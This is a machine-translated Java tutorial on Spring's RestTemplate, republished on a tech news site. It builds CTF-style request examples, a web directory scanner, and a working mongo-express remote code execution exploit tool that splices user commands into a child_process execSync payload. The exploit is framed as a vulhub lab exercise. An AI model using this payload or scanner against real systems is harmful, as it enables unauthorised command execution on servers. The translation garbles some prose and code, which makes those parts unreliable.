Shulou(Shulou.com)06/01 Report--

This article mainly introduces how to use java distributed based on RestTemplate, has a certain reference value, interested friends can refer to, I hope you can learn a lot after reading this article, the following let the editor take you to understand.

1. Preface

Recently, when I was exposed to the knowledge of distribution, I learned some of the uses of RestTemplate. RestTemplate is commonly used to make some http requests. After using it, the editor feels very convenient while the grammar is concise.

So I wondered whether it would be more convenient to make an online "arsenal" through RestTemplate. Because Springboot development is relatively simple, and in the later stage of some team collaboration, is it more convenient to use the online platform than the team? The problems caused by environmental inconsistencies are avoided.

2.RestTemplate get request and passing parameters 2.1 normal get request without parameters

First of all, let's use the normal request with no parameters. Since you want to use RestTemplate, you must first new it. The request is then made using rest.exchange.

The exchange parameters are described as follows:

Type description url request path method request method (GET, POST, PUT, etc.) requestEntityHttpEntity object, which encapsulates the request header and the data returned by the request body responseType data type uriVariables supports PathVariable type data.

Parameter 1, not too much explanation 2, parameter 3, in the initialization of HttpEntity, you can pass in a custom headers.

So pass HttpHeaders headers = new HttpHeaders () ahead of time.

Just set the headers and pass it in.

RequestMapping ("gettest") public @ ResponseBody String param () {RestTemplate rest = new RestTemplate (); HttpHeaders headers = new HttpHeaders (); headers.set ("user-agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10 / 11 / 3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"); String url = "http://127.0.0.1/t.php"; ResponseEntity res = rest.exchange (url, HttpMethod.GET,new HttpEntity (null,headers), String.class); String body = res.getBody (); return body;}

In the code above, a php file is requested, and the php file is very simple, just printing out the user_agent.

After printing out the user_agent, the ResponseEntity res receives the echo information here, and finally successfully obtains the echo data of the page through res.getBody ();

2.2 get request to use with parameters

After understanding the above no-parameter get request, let's learn how to pass parameters.

Doesn't it feel a little boring? To do this, add a little CTF element. The code is as follows. Only if the user passes the parameter in accordance with the if judgment of the fourth line, will the correct flag be output.

Parameter transfer method:

This is also one of the most common, that is, the use of parameters to receive, does it feel very similar to the code in the no-parameter get mode above? The following parameters agent and value are the parameter names on the web page (PS: all friends who have studied springboot should know). After that, agent is set into headers, and value is spliced to * * t.phpumped value = * * and passed as a parameter value.

Public @ ResponseBody String param (* * String agent,String value**) {RestTemplate rest = new RestTemplate (); HttpHeaders headers = new HttpHeaders (); headers.set ("user-agent", * * agent**); String url = "http://127.0.0.1/t.php?value="+**value**; ResponseEntity res = rest.exchange (url, HttpMethod.GET,new HttpEntity (null,headers), String.class) String body = res.getBody (); return body;}

Finally, a test is carried out, and the parameter is passed successfully to get "flag".

2.3 write an online directory scan script

Now that you've played with the get request, let's do a small function of directory scanning. After all, put what you have learned into practice.

The overall implementation process is as follows, using springboot, and integrating mybatis. The Service layer is not written here, because after all, it is only a preliminary implementation.

One of the most obvious advantages is that the site directory will be stored in the database, which avoids the problem of lack of dictionaries and insufficient use in the later development. Because team members can store their dictionaries in the database.

First of all, prepare the database and some "dictionaries". In the test phase, I manually added several. Later, if the dictionary is large, you can write a small script and import it into the database.

Once the database is ready, you can integrate mybatis. Here the pom file needs to load the dependencies of mybatis and mysql.

The directory structure is as follows: a Controller, a mapper and xml configuration file, and a class for storage

Application main configuration file, mainly used to write some database configurations

Server.port=8081spring.datasource.username=rootspring.datasource.password=rootspring.datasource.url=jdbc:mysql://localhost:3306/tance?useSSL=false&useUnicode=true&characterEncoding=utf-8mybatis.mapper-locations=classpath:Mapper/*.xml

The Mapper code is as follows, remember to add the @ Mapper annotation

@ Mapperpublic interface MuluMapper {List selectAll ();}

Mapper.xml configuration, used to query "dictionaries" in the database

Select * from catalogue

Now that it has been configured, it is time to realize the important function points! The code is simple: first, mapper is automatically injected through @ Autowired.

Then List list = muluMapper.selectAll ()

The select query statement is executed in mapper.xml and saved to the List collection. Finally, during the loop traversal in the for loop, the url is spliced with the contents of the name field in the acquired database and saved to the temporary variable temp.

For example:

The user enters url as http://127.0.0.1

The first content of the name field is: admin

So eventually temp= http://127.0.0.1/admin

After the splicing is completed, through exchange access, the final res.getStatusCodeValue () gets the response code, which determines the existence of the file if it is 200. (PS: the judgment here is rather sloppy, for example, the situation of 403 is not judged.)

@ RestControllerpublic class MapperController {@ Autowired MuluMapper muluMapper; @ RequestMapping ("/ tance") public String tance (String url) {RestTemplate rest = new RestTemplate (); HttpHeaders headers = new HttpHeaders (); List lists = new ArrayList (); headers.set ("user-agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 1011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36") List list = muluMapper.selectAll (); if (! url.endsWith ("/")) {url+= "/";} for (catalogue tance: list) {String temp = url+tance.getName (); try {ResponseEntity res = rest.exchange (temp, HttpMethod.GET,new HttpEntity (null,headers), String.class) Lists.add ("directory exists:" + temp+ "response status code is:" + res.getStatusCodeValue ());} catch (Exception e) {e.printStackTrace ();}} return lists.toString ();}}

Take a look at the finished product and successfully implement a simple online web directory scan.

3.RestTemplate post request 3.1 post request play

With the above ideas in mind, post is similar. So in order to prevent everyone from feeling bored, let's continue to play this "CTF".

The code of php hasn't changed much, but the request is changed to post.

The RestTemplate code is as follows: pass parameters to set agent to headers, and value is added to LinkedMultiValueMap, it can be understood that this LinkedMultiValueMap is used to store the data to be submitted by post, while the last one is slightly different is that restTemplate.postForEntity () is used to submit data by post, which is very similar to get.

RequestMapping ("/ Post01") public @ ResponseBody String Post01 (String agent,String value) {RestTemplate restTemplate = new RestTemplate (); HttpHeaders headers = new HttpHeaders (); headers.set ("user-agent", agent); String url = "http://127.0.0.1/t.php"; LinkedMultiValueMap params = new LinkedMultiValueMap (); params.add (" value ", value) ResponseEntity str = restTemplate.postForEntity (url,new HttpEntity (params,headers), String.class); return str.getBody ();

Finally, you can pass the parameter, dong, "flag" also appeared.

3.2 mongo-express remote code execution vulnerability scripting

The range installation can be downloaded directly to vulhub. The installation process is simple, after startup

The exploit process is simpler than entering the command to be executed in execSync. Returning Valid indicates that the execution is successful.

After that, you can check the docker and find that the 1.txt has been created successfully.

Next, write a script that uses

First prepare an ugly front-end page and store it in the static directory, which is where Springboot stores static resources by default.

Mongo-express remote code execution vulnerability please enter vulnerability URL: please enter the command to be executed:

Controller writing ideas, first of all, you can see that action was submitted to exec, so RequestMapping can be written as exec, parameters, a url to receive url addresses, a command to receive commands.

The complete Controller is as follows, and the author takes you for further analysis: in the paramMap.add statement, you can see that the input command is spliced, assuming that the input here is "ls", thus forming the following data

Document=this.constructor.constructor ("return process") (). MainModule.require ("child_process"). ExecSync ("ls")

Finally, the POST submission is carried out using the exchange method, and the submitted URL is passed in by the author, and after the command is passed and spliced in, the data is finally stored in the httpEntity, and the parameters here are not explained too much, because with the previous foundation, you should be able to understand what it means.

RequestMapping ("/ exec") public @ ResponseBody String Post01 (String url,String command) {RestTemplate restTemplate = new RestTemplate (); HttpHeaders headers = new HttpHeaders (); headers.set ("user-agent", "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"); MultiValueMap paramMap = new LinkedMultiValueMap () ParamMap.add ("document", "this.constructor.constructor (\" return process\ ") (). MainModule.require (\" child_process\ "). ExecSync (" + "\"+ command+"\ "" + ")); HttpEntity httpEntity = new HttpEntity (paramMap,headers); ResponseEntity response = null; try {response = restTemplate.exchange (url,HttpMethod.POST,httpEntity, String.class) } catch (NullPointerException e) {e.printStackTrace ();} return response.getBody ();}

The final testing process, writing a script to take advantage of success

Thank you for reading this article carefully. I hope the article "how to use java distributed based on RestTemplate" shared by the editor will be helpful to everyone. At the same time, I also hope you will support us and pay attention to the industry information channel. More related knowledge is waiting for you to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.